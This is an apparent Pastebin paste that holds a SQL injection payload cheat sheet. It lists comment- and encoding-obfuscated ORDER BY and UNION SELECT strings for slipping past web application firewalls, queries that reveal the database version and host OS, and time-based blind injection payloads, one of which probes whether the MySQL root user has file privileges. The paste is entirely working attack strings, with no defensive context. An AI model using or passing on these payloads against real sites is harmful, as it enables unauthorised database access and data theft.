Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- +++ Order by, bypass WAF +++
- 1] Null' order by 100--+
- 2] ')group by 99-- -
- 3] group/**/by/**/99%23%23
- 4] +%0aorder%0aby%0a+
- 5] +/*!42247order*//**//*!42247by*/+
- 6] order by/**_**/1--
- 7] /*!12345order*/+/*!12345by*/1--
- 8] %')order by 1%23%23
- +++ Union select buffer overflow, bypass WAF +++
- 1] +uNIOn%23xxxxxxxxxxx%0aSELECT+
- 2] +And+mod(29,0)+/*!50000UNioN*/+/*!50000SeLeCT*/+
- 3] +AND+MOD(52,12)+/*!50000UNION/**_**/*/+/*!50000SELECT/**_**/*/
- 4] +And .0union/**_**/distinctrow%23GearFourthXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXY%0aselect/**_**/distinctrow
- +++ Print System +++
- 1] @@version
- 2] @@version_comment
- 3] @@version_compile_os
- 4] @@version_compile_machine
- 5] version()
- +++ Time Based HTTP Method POST +++
- 1] admin' AND sleep(10);-- -
- 2] ‘%2b(select*from(select(sleep(5)))a)%2b’
- 3] and IF(SUBSTRING((select 1 from [guess_your_table_name] limit 0,1),1,1)=1,SLEEP(5),1)
- 4] AND if (MID((SELECT file_priv FROM mysql.user WHERE user = 'root'),1,1) = 'Y', sleep(10), null)--
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement